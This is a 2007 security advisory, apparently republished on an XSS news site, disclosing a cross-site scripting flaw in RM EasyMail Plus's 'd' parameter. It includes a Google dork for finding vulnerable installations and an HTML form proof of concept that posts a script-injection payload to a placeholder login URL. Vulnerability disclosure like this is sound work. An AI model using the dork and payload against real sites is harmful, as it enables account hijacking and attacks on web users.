Advertisements

 RM EasyMail Plus - Cross-Site Scripting Exploit

Monday, 21 May 2007

The variable 'd' (when used with POST and GET) is vulnerable to Cross-Site Scripting attacks.

Vulnerable: RM EasyMail Plus (other versions should also be vulnerable)
Google d0rk: intitle:"Powered by RM EasyMail Plus"

John Martinelli
john@martinelli.com

RedLevel Security
RedLevel.org

May 6th, 2007

!-->

<html>
<head><title>RM EasyMail Plus - Cross-Site Scripting Exploit</title><body>

<center><br><br><font size=4>RM EasyMail Plus - Cross-Site Scripting Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br>Google d0rk: <a href="http://www.google.com/search?hl=en&q=%22powered+by+rm+easymail+plus%22">intitle:"Powered by RM EasyMail Plus"</a></font><br>

<br><br>
<form action="http://mail.target.com/cp/ps/Main/login/Login" method="post">
<input type=hidden name="s" value="1">
<input name="d" size=75 value=">'><script>alert(1);</script>">
<input type=submit value="Execute XSS Attack" class="button">
</form>


Original article:
http://redlevel.org/wp-content/uploads/2007/05/rmeasymail.txt



Share this content:
        
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.